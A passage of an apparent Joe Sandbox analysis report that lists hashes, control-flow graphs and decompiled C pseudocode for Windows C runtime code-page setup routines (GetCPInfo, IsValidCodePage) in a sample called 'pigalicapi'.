                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F01D5D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentStrings$Free_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2716640707-0
                                                                                                                                                                                                                                                    • Opcode ID: fbbd288d59445649193e0524f33cfab3efc4b613d721afd328ea6c29f8eca6ba
                                                                                                                                                                                                                                                    • Instruction ID: 8228864deb03bbb4999655d6a8d3fe95ae5be2c880d6b068e05f50ead9bf8d72
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbbd288d59445649193e0524f33cfab3efc4b613d721afd328ea6c29f8eca6ba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BE02B3750992567E2212335BC89EBF3B4DFFC17B47250115F50896182EF558C0270F1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 118 efb225-efb259 GetCPInfo 119 efb34f-efb35c 118->119 120 efb25f 118->120 122 efb362-efb372 119->122 121 efb261-efb26b 120->121 121->121 123 efb26d-efb280 121->123 124 efb37e-efb385 122->124 125 efb374-efb37c 122->125 126 efb2a1-efb2a3 123->126 128 efb387-efb38e 124->128 129 efb395 124->129 127 efb391-efb393 125->127 131 efb2a5-efb2dc call efa4fd call efcaa6 126->131 132 efb282-efb289 126->132 130 efb397-efb3a6 127->130 128->127 129->130 130->122 133 efb3a8-efb3b8 call efdc5f 130->133 143 efb2e1-efb30c call efcaa6 131->143 134 efb298-efb29a 132->134 137 efb29c-efb29f 134->137 138 efb28b-efb28d 134->138 137->126 138->137 141 efb28f-efb297 138->141 141->134 146 efb30e-efb318 143->146 147 efb31a-efb326 146->147 148 efb328-efb32a 146->148 149 efb338-efb33f 147->149 150 efb32c-efb331 148->150 151 efb341 148->151 152 efb348-efb34b 149->152 150->149 151->152 152->146 153 efb34d 152->153 153->133
                                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                                    			E00EFB225(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				char _v264;
                                                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                                                    				char _v776;
                                                                                                                                                                                                                                                    				char _v1800;
                                                                                                                                                                                                                                                    				char _v1814;
                                                                                                                                                                                                                                                    				struct _cpinfo _v1820;
                                                                                                                                                                                                                                                    				intOrPtr _v1824;
                                                                                                                                                                                                                                                    				signed int _v1828;
                                                                                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                                    				signed int _t68;
                                                                                                                                                                                                                                                    				intOrPtr _t69;
                                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                                    				char _t73;
                                                                                                                                                                                                                                                    				char _t74;
                                                                                                                                                                                                                                                    				signed char _t75;
                                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                                    				signed char _t86;
                                                                                                                                                                                                                                                    				char _t87;
                                                                                                                                                                                                                                                    				char _t90;
                                                                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                                                                    				signed int _t95;
                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                    				char* _t97;
                                                                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                                                                    				signed int _t102;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t95 = __edx;
                                                                                                                                                                                                                                                    				_t63 =  *0xf8dd74; // 0x3af7f1ec
                                                                                                                                                                                                                                                    				_v8 = _t63 ^ _t102;
                                                                                                                                                                                                                                                    				_t101 = _a4;
                                                                                                                                                                                                                                                    				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
                                                                                                                                                                                                                                                    					_t96 = _t101 + 0x119;
                                                                                                                                                                                                                                                    					_t90 = 0;
                                                                                                                                                                                                                                                    					_t67 = 0xffffff9f;
                                                                                                                                                                                                                                                    					_t68 = _t67 - _t96;
                                                                                                                                                                                                                                                    					__eflags = _t68;
                                                                                                                                                                                                                                                    					_v1828 = _t68;
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						_t97 = _t96 + _t90;
                                                                                                                                                                                                                                                    						_t69 = _t68 + _t97;
                                                                                                                                                                                                                                                    						_v1824 = _t69;
                                                                                                                                                                                                                                                    						__eflags = _t69 + 0x20 - 0x19;
                                                                                                                                                                                                                                                    						if(_t69 + 0x20 > 0x19) {
                                                                                                                                                                                                                                                    							__eflags = _v1824 - 0x19;
                                                                                                                                                                                                                                                    							if(_v1824 > 0x19) {
                                                                                                                                                                                                                                                    								 *_t97 = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_t72 = _t101 + _t90;
                                                                                                                                                                                                                                                    								_t57 = _t72 + 0x19;
                                                                                                                                                                                                                                                    								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                                                                                                                                                                                                                                                    								__eflags =  *_t57;
                                                                                                                                                                                                                                                    								_t59 = _t90 - 0x20; // -32
                                                                                                                                                                                                                                                    								_t73 = _t59;
                                                                                                                                                                                                                                                    								goto L24;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
                                                                                                                                                                                                                                                    							_t54 = _t90 + 0x20; // 0x20
                                                                                                                                                                                                                                                    							_t73 = _t54;
                                                                                                                                                                                                                                                    							L24:
                                                                                                                                                                                                                                                    							 *_t97 = _t73;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t68 = _v1828;
                                                                                                                                                                                                                                                    						_t96 = _t101 + 0x119;
                                                                                                                                                                                                                                                    						_t90 = _t90 + 1;
                                                                                                                                                                                                                                                    						__eflags = _t90 - 0x100;
                                                                                                                                                                                                                                                    					} while (_t90 < 0x100);
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t74 = 0;
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
                                                                                                                                                                                                                                                    						_t74 = _t74 + 1;
                                                                                                                                                                                                                                                    					} while (_t74 < 0x100);
                                                                                                                                                                                                                                                    					_t75 = _v1814;
                                                                                                                                                                                                                                                    					_t93 =  &_v1814;
                                                                                                                                                                                                                                                    					_v264 = 0x20;
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						_t108 = _t75;
                                                                                                                                                                                                                                                    						if(_t75 == 0) {
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t95 =  *(_t93 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                    						_t76 = _t75 & 0x000000ff;
                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                    							__eflags = _t76 - _t95;
                                                                                                                                                                                                                                                    							if(_t76 > _t95) {
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__eflags = _t76 - 0x100;
                                                                                                                                                                                                                                                    							if(_t76 < 0x100) {
                                                                                                                                                                                                                                                    								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
                                                                                                                                                                                                                                                    								_t76 = _t76 + 1;
                                                                                                                                                                                                                                                    								__eflags = _t76;
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t93 = _t93 + 2;
                                                                                                                                                                                                                                                    						__eflags = _t93;
                                                                                                                                                                                                                                                    						_t75 =  *_t93;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					E00EFA4FD(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
                                                                                                                                                                                                                                                    					E00EFCAA6(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0); // executed
                                                                                                                                                                                                                                                    					E00EFCAA6(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
                                                                                                                                                                                                                                                    					_t94 = 0;
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
                                                                                                                                                                                                                                                    						if((_t86 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                    							__eflags = _t86 & 0x00000002;
                                                                                                                                                                                                                                                    							if((_t86 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                    								 *((char*)(_t101 + _t94 + 0x119)) = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_t37 = _t101 + _t94 + 0x19;
                                                                                                                                                                                                                                                    								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
                                                                                                                                                                                                                                                    								__eflags =  *_t37;
                                                                                                                                                                                                                                                    								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
                                                                                                                                                                                                                                                    								goto L15;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
                                                                                                                                                                                                                                                    							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
                                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                                    							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t94 = _t94 + 1;
                                                                                                                                                                                                                                                    					} while (_t94 < 0x100);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return E00EFDC5F(_v8 ^ _t102);
                                                                                                                                                                                                                                                    			}































                                                                                                                                                                                                                                                    0x00efb225
                                                                                                                                                                                                                                                    0x00efb230
                                                                                                                                                                                                                                                    0x00efb237
                                                                                                                                                                                                                                                    0x00efb23c
                                                                                                                                                                                                                                                    0x00efb259
                                                                                                                                                                                                                                                    0x00efb351
                                                                                                                                                                                                                                                    0x00efb357
                                                                                                                                                                                                                                                    0x00efb359
                                                                                                                                                                                                                                                    0x00efb35a
                                                                                                                                                                                                                                                    0x00efb35a
                                                                                                                                                                                                                                                    0x00efb35c
                                                                                                                                                                                                                                                    0x00efb362
                                                                                                                                                                                                                                                    0x00efb362
                                                                                                                                                                                                                                                    0x00efb364
                                                                                                                                                                                                                                                    0x00efb366
                                                                                                                                                                                                                                                    0x00efb36f
                                                                                                                                                                                                                                                    0x00efb372
                                                                                                                                                                                                                                                    0x00efb37e
                                                                                                                                                                                                                                                    0x00efb385
                                                                                                                                                                                                                                                    0x00efb395
                                                                                                                                                                                                                                                    0x00efb387
                                                                                                                                                                                                                                                    0x00efb387
                                                                                                                                                                                                                                                    0x00efb38a
                                                                                                                                                                                                                                                    0x00efb38a
                                                                                                                                                                                                                                                    0x00efb38a
                                                                                                                                                                                                                                                    0x00efb38e
                                                                                                                                                                                                                                                    0x00efb38e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb38e
                                                                                                                                                                                                                                                    0x00efb374
                                                                                                                                                                                                                                                    0x00efb374
                                                                                                                                                                                                                                                    0x00efb379
                                                                                                                                                                                                                                                    0x00efb379
                                                                                                                                                                                                                                                    0x00efb391
                                                                                                                                                                                                                                                    0x00efb391
                                                                                                                                                                                                                                                    0x00efb391
                                                                                                                                                                                                                                                    0x00efb397
                                                                                                                                                                                                                                                    0x00efb39d
                                                                                                                                                                                                                                                    0x00efb3a3
                                                                                                                                                                                                                                                    0x00efb3a4
                                                                                                                                                                                                                                                    0x00efb3a4
                                                                                                                                                                                                                                                    0x00efb25f
                                                                                                                                                                                                                                                    0x00efb25f
                                                                                                                                                                                                                                                    0x00efb261
                                                                                                                                                                                                                                                    0x00efb261
                                                                                                                                                                                                                                                    0x00efb268
                                                                                                                                                                                                                                                    0x00efb269
                                                                                                                                                                                                                                                    0x00efb26d
                                                                                                                                                                                                                                                    0x00efb273
                                                                                                                                                                                                                                                    0x00efb279
                                                                                                                                                                                                                                                    0x00efb2a1
                                                                                                                                                                                                                                                    0x00efb2a1
                                                                                                                                                                                                                                                    0x00efb2a3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb282
                                                                                                                                                                                                                                                    0x00efb286
                                                                                                                                                                                                                                                    0x00efb298
                                                                                                                                                                                                                                                    0x00efb298
                                                                                                                                                                                                                                                    0x00efb29a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb28b
                                                                                                                                                                                                                                                    0x00efb28d
                                                                                                                                                                                                                                                    0x00efb28f
                                                                                                                                                                                                                                                    0x00efb297
                                                                                                                                                                                                                                                    0x00efb297
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb297
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb28d
                                                                                                                                                                                                                                                    0x00efb29c
                                                                                                                                                                                                                                                    0x00efb29c
                                                                                                                                                                                                                                                    0x00efb29f
                                                                                                                                                                                                                                                    0x00efb29f
                                                                                                                                                                                                                                                    0x00efb2bb
                                                                                                                                                                                                                                                    0x00efb2dc
                                                                                                                                                                                                                                                    0x00efb304
                                                                                                                                                                                                                                                    0x00efb30c
                                                                                                                                                                                                                                                    0x00efb30e
                                                                                                                                                                                                                                                    0x00efb30e
                                                                                                                                                                                                                                                    0x00efb318
                                                                                                                                                                                                                                                    0x00efb328
                                                                                                                                                                                                                                                    0x00efb32a
                                                                                                                                                                                                                                                    0x00efb341
                                                                                                                                                                                                                                                    0x00efb32c
                                                                                                                                                                                                                                                    0x00efb32c
                                                                                                                                                                                                                                                    0x00efb32c
                                                                                                                                                                                                                                                    0x00efb32c
                                                                                                                                                                                                                                                    0x00efb331
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb331
                                                                                                                                                                                                                                                    0x00efb31a
                                                                                                                                                                                                                                                    0x00efb31a
                                                                                                                                                                                                                                                    0x00efb31f
                                                                                                                                                                                                                                                    0x00efb338
                                                                                                                                                                                                                                                    0x00efb338
                                                                                                                                                                                                                                                    0x00efb338
                                                                                                                                                                                                                                                    0x00efb348
                                                                                                                                                                                                                                                    0x00efb349
                                                                                                                                                                                                                                                    0x00efb34d
                                                                                                                                                                                                                                                    0x00efb3b8

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: 7f61391d1dea1c742fcfa495ce35192addba11f227867a35011cb518ad6e4819
                                                                                                                                                                                                                                                    • Instruction ID: 93b3827a09203806a4aa27392612feaa73cbff9048678d999a5d7ca7fbc2248b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f61391d1dea1c742fcfa495ce35192addba11f227867a35011cb518ad6e4819
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9412B7050434C9ADB218E64CC84BFABBFEEF45308F2414EDE68AA7142D375AA45DF20
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 154 efb57a-efb59e call efb14d 157 efb5ae-efb5b5 154->157 158 efb5a0-efb5a9 call efb1c0 154->158 159 efb5b8-efb5be 157->159 166 efb75b-efb76a call efdc5f 158->166 161 efb6ae-efb6cd call eff070 159->161 162 efb5c4-efb5d0 159->162 174 efb6d0-efb6d5 161->174 162->159 164 efb5d2-efb5d8 162->164 168 efb5de-efb5e4 164->168 169 efb6a6-efb6a9 164->169 168->169 172 efb5ea-efb5f6 IsValidCodePage 168->172 173 efb75a 169->173 172->169 175 efb5fc-efb609 GetCPInfo 172->175 173->166 176 efb70c-efb716 174->176 177 efb6d7-efb6dc 174->177 180 efb60f-efb630 call eff070 175->180 181 efb693-efb699 175->181 176->174 182 efb718-efb73f call efb10f 176->182 178 efb6de-efb6e4 177->178 179 efb709 177->179 183 efb6fd-efb6ff 178->183 179->176 193 efb683 180->193 194 efb632-efb639 180->194 181->169 185 efb69b-efb6a1 call efb1c0 181->185 196 efb740-efb74f 182->196 187 efb6e6-efb6ec 183->187 188 efb701-efb707 183->188 200 efb757-efb758 185->200 187->188 192 efb6ee-efb6f9 187->192 188->177 188->179 192->183 197 efb686-efb68e 193->197 198 efb65c-efb65f 194->198 199 efb63b-efb640 194->199 196->196 201 efb751-efb752 call efb225 196->201 197->201 202 efb664-efb66b 198->202 199->198 203 efb642-efb648 199->203 200->173 201->200 202->202 205 efb66d-efb681 call efb10f 202->205 206 efb650-efb652 203->206 205->197 208 efb64a-efb64f 206->208 209 efb654-efb65a 206->209 208->206 209->198 209->199
                                                                                                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                                                                                                    			E00EFB57A(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				char _v22;
                                                                                                                                                                                                                                                    				struct _cpinfo _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                                                                    				int _t51;
                                                                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                                                                    				short _t58;
                                                                                                                                                                                                                                                    				signed char _t62;
                                                                                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                                                                                    				signed char* _t72;
                                                                                                                                                                                                                                                    				signed char* _t73;
                                                                                                                                                                                                                                                    				int _t78;
                                                                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                                                                    				signed char* _t82;
                                                                                                                                                                                                                                                    				short* _t83;
                                                                                                                                                                                                                                                    				int _t87;
                                                                                                                                                                                                                                                    				signed char _t88;
                                                                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                                                                    				signed int _t91;
                                                                                                                                                                                                                                                    				signed int _t92;
                                                                                                                                                                                                                                                    				int _t94;
                                                                                                                                                                                                                                                    				int _t95;
                                                                                                                                                                                                                                                    				intOrPtr _t98;
                                                                                                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t48 =  *0xf8dd74; // 0x3af7f1ec
                                                                                                                                                                                                                                                    				_v8 = _t48 ^ _t99;
                                                                                                                                                                                                                                                    				_t98 = _a8;
                                                                                                                                                                                                                                                    				_t78 = E00EFB14D(__eflags, _a4);
                                                                                                                                                                                                                                                    				if(_t78 != 0) {
                                                                                                                                                                                                                                                    					_t94 = 0;
                                                                                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                                                                                    					_t81 = 0;
                                                                                                                                                                                                                                                    					_t51 = 0;
                                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						__eflags =  *((intOrPtr*)(_t51 + 0xf8d7e8)) - _t78;
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t51 + 0xf8d7e8)) == _t78) {
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t81 = _t81 + 1;
                                                                                                                                                                                                                                                    						_t51 = _t51 + 0x30;
                                                                                                                                                                                                                                                    						_v32 = _t81;
                                                                                                                                                                                                                                                    						__eflags = _t51 - 0xf0;
                                                                                                                                                                                                                                                    						if(_t51 < 0xf0) {
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							__eflags = _t78 - 0xfde8;
                                                                                                                                                                                                                                                    							if(_t78 == 0xfde8) {
                                                                                                                                                                                                                                                    								L23:
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								__eflags = _t78 - 0xfde9;
                                                                                                                                                                                                                                                    								if(_t78 == 0xfde9) {
                                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
                                                                                                                                                                                                                                                    									__eflags = _t51;
                                                                                                                                                                                                                                                    									if(_t51 == 0) {
                                                                                                                                                                                                                                                    										goto L23;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_t51 = GetCPInfo(_t78,  &_v28);
                                                                                                                                                                                                                                                    										__eflags = _t51;
                                                                                                                                                                                                                                                    										if(_t51 == 0) {
                                                                                                                                                                                                                                                    											__eflags =  *0xf8e17c - _t94; // 0x0
                                                                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                                                                    												goto L23;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												E00EFB1C0(_t98);
                                                                                                                                                                                                                                                    												goto L37;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											E00EFF070(_t94, _t98 + 0x18, _t94, 0x101);
                                                                                                                                                                                                                                                    											 *(_t98 + 4) = _t78;
                                                                                                                                                                                                                                                    											 *(_t98 + 0x21c) = _t94;
                                                                                                                                                                                                                                                    											_t78 = 1;
                                                                                                                                                                                                                                                    											__eflags = _v28 - 1;
                                                                                                                                                                                                                                                    											if(_v28 <= 1) {
                                                                                                                                                                                                                                                    												 *(_t98 + 8) = _t94;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												__eflags = _v22;
                                                                                                                                                                                                                                                    												_t72 =  &_v22;
                                                                                                                                                                                                                                                    												if(_v22 != 0) {
                                                                                                                                                                                                                                                    													while(1) {
                                                                                                                                                                                                                                                    														_t88 = _t72[1];
                                                                                                                                                                                                                                                    														__eflags = _t88;
                                                                                                                                                                                                                                                    														if(_t88 == 0) {
                                                                                                                                                                                                                                                    															goto L16;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														_t91 = _t88 & 0x000000ff;
                                                                                                                                                                                                                                                    														_t89 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                                                                    														while(1) {
                                                                                                                                                                                                                                                    															__eflags = _t89 - _t91;
                                                                                                                                                                                                                                                    															if(_t89 > _t91) {
                                                                                                                                                                                                                                                    																break;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
                                                                                                                                                                                                                                                    															_t89 = _t89 + 1;
                                                                                                                                                                                                                                                    															__eflags = _t89;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														_t72 =  &(_t72[2]);
                                                                                                                                                                                                                                                    														__eflags =  *_t72;
                                                                                                                                                                                                                                                    														if( *_t72 != 0) {
                                                                                                                                                                                                                                                    															continue;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														goto L16;
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												L16:
                                                                                                                                                                                                                                                    												_t73 = _t98 + 0x1a;
                                                                                                                                                                                                                                                    												_t87 = 0xfe;
                                                                                                                                                                                                                                                    												do {
                                                                                                                                                                                                                                                    													 *_t73 =  *_t73 | 0x00000008;
                                                                                                                                                                                                                                                    													_t73 =  &(_t73[1]);
                                                                                                                                                                                                                                                    													_t87 = _t87 - 1;
                                                                                                                                                                                                                                                    													__eflags = _t87;
                                                                                                                                                                                                                                                    												} while (_t87 != 0);
                                                                                                                                                                                                                                                    												 *(_t98 + 0x21c) = E00EFB10F( *(_t98 + 4));
                                                                                                                                                                                                                                                    												 *(_t98 + 8) = _t78;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_t95 = _t98 + 0xc;
                                                                                                                                                                                                                                                    											asm("stosd");
                                                                                                                                                                                                                                                    											asm("stosd");
                                                                                                                                                                                                                                                    											asm("stosd");
                                                                                                                                                                                                                                                    											L36:
                                                                                                                                                                                                                                                    											E00EFB225(_t78, _t91, _t95, _t98, _t98); // executed
                                                                                                                                                                                                                                                    											L37:
                                                                                                                                                                                                                                                    											__eflags = 0;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L39;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					E00EFF070(_t94, _t98 + 0x18, _t94, 0x101);
                                                                                                                                                                                                                                                    					_t54 = _v32 * 0x30;
                                                                                                                                                                                                                                                    					__eflags = _t54;
                                                                                                                                                                                                                                                    					_v36 = _t54;
                                                                                                                                                                                                                                                    					_t55 = _t54 + 0xf8d7f8;
                                                                                                                                                                                                                                                    					_v32 = _t55;
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						__eflags =  *_t55;
                                                                                                                                                                                                                                                    						_t82 = _t55;
                                                                                                                                                                                                                                                    						if( *_t55 != 0) {
                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                    								_t62 = _t82[1];
                                                                                                                                                                                                                                                    								__eflags = _t62;
                                                                                                                                                                                                                                                    								if(_t62 == 0) {
                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t92 =  *_t82 & 0x000000ff;
                                                                                                                                                                                                                                                    								_t63 = _t62 & 0x000000ff;
                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                    									__eflags = _t92 - _t63;
                                                                                                                                                                                                                                                    									if(_t92 > _t63) {
                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									__eflags = _t92 - 0x100;
                                                                                                                                                                                                                                                    									if(_t92 < 0x100) {
                                                                                                                                                                                                                                                    										_t31 = _t94 + 0xf8d7e4; // 0x8040201
                                                                                                                                                                                                                                                    										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
                                                                                                                                                                                                                                                    										_t92 = _t92 + 1;
                                                                                                                                                                                                                                                    										__eflags = _t92;
                                                                                                                                                                                                                                                    										_t63 = _t82[1] & 0x000000ff;
                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t82 =  &(_t82[2]);
